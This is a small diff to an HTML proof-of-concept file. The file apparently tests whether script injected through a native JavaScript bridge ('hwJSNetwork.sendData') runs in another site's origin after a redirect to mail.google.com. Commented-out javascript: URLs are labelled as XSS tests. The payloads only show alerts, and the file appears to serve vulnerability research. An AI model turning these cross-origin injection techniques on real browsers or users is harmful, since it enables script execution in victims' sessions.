--- a/window-open-iframe-js.html
+++ b/window-open-iframe-js.html
@@ -1,6 +1,6 @@
 <body>
 <script>
-  hwJSNetwork.sendData("https://", "GET", "", "", "window.setInterval(() => { console.log(window.location.origin); if(window.location.origin.contains('google')) alert(1);}, 10); dummy");
+  hwJSNetwork.sendData("https://", "GET", "", "", "window.setInterval(() => { var o = window.location.origin; console.log(o); if(o.contains('google')) alert(1);}, 10); dummy");
   window.setTimeout(()=> { top.location="https://mail.google.com"; }, 2000);
 //  window.open('javascript:var elem = document.createElement("p");elem.innerHTML = "<b>Executed JS in parent origin: "+window.location.origin+"</b>"; document.body.append(elem);alert("XSS in doc.domain: "+document.domain+", win.origin: "+window.location.origin)');
 //  window.open("javascript:alert('Executed JS in target '+window.location.origin)");
